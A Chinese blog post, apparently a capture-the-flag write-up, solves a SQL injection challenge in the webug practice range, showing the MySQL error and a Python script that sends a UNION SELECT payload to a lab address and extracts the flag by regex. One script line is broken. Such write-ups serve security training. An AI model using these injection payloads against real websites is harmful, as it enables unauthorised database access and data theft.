webug靶场一道简单的注入题

加点后报错

could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

大致可以猜出是双引号的问题,闭合即可,接下来就是常规的注入过程,最后拿到flag

下面是代码

#-*- coding:utf-8 -*-

import requests

import re

def poc():

    url="http://192.168.241.128/pentest/test/sqli/sqltamp.php"

    data={

        "gid":"-1' union select 1,flag,3,4 from flag #"

    }

    req=requests.get(url,data)

    red=requests.p

    html=req.content

    html=html.decode('utf-8')

    sear=r'名称为:(.+?)</font>'

    flag=re.findall(sear,html)

    with open('test1.txt','w') as f:

        f.write(str(flag))

if __name__ == '__main__':

    poc()

这里我用正则匹配将flag匹配并写入文件,一定要对返回的数据进行转码

否则匹配不到,还有%23要写成#才能被python识别。

最新文章

  1. bzoj 1191: [HNOI2006]超级英雄Hero
  2. Spring3 整合MyBatis3 配置多数据源 动态选择SqlSessionFactory
  3. iOS开发之时间格式的转化
  4. 圆形imageview
  5. linux free命令中buffer与cache的区别
  6. CSS中的content和attr的用法
  7. C#中英文混合字符串过长截断
  8. vs2013+EF6+Mysql
  9. POJ 3318 - Matrix Multiplication 第一次用随机化解决问题...
  10. 探秘ReSharper8.1版本中Architecture(架构工具)的改进
  11. qlv格式转换成MP4格式
  12. python 生成html文件(表格)
  13. ZooKeeper 数据模型
  14. MIUI系统如何获取ROOT权限
  15. 用Promise对象实现的 Ajax 操作
  16. NOI.AC NOIP模拟赛 第二场 补记
  17. [ZHOJ1954]lyd的旅行
  18. Mac下使用ABTestingGateway快速搭建灰度网关
  19. C++解析(11):对象的构造
  20. 扩展KMP - HDU 4333 Revolving Digits

热门文章

  1. 惠州发布5G任务计划表,将出台智慧灯杆建设计划与技术规范
  2. CentOS下搭建禅道Bug反馈系统
  3. 使用wapiti进网站进行安全性测试
  4. GoLang 自学系列(二)—— defer
  5. 基于 MongoDB 动态字段设计的探索 (二) 聚合操作
  6. Django搭建示例项目实战与避坑细节
  7. 老猿学5G:多量纲计费与QoS的QCI、5QI、ARP、GBR和MBR
  8. moviepy音视频剪辑:使用rotate函数实现视频变换处理以及参数expand取值为True时的花屏问题解决方案
  9. 第15.25节 PyQt(Python+Qt)入门学习:Model/View开发实战--使用QTableView展示Excel文件内容
  10. CSP-S2020初赛游记